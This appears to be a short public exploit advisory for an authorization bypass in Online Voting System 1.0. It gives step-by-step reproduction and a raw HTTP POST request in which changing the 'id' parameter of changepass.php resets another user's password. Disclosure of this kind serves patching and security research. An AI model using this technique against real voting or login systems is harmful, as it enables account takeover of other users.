Online Voting System 1.0 Authorization Bypass

Online Voting System version 1.0 suffers from an authorization bypass vulnerability that allows for the password change of other users.

## Steps to reproduce
# 1. Register an account (any user): http://TARGET/online_voting/registeracc.php
# 2. Login
# 3. Goto change password: http://TARGET/online_voting/changepass.php
# 4. Change the password and intercept the request with Burp Suite
# 5. Change the id paramater (id=7 to, id=1) of the url to another users account, Password will be updated

POST /online_voting/changepass.php?id=7 HTTP/1.1
Host: TARGET
Content-Length: 55
Connection: close
Referer: http://localhost/online_voting/changepass.php?id=7
Cookie: PHPSESSID=t19ph5v0sem2pi0gaap55j08ei

oldpass=a&newpass=a&conpass=a&changepass=Update+Profile

Exploit

Authorization Bypass

Backdoor.Win32.Mhtserv.b Missing Authentication Previous

Backdoor.Win32.MiniBlackLash Denial Of Service Next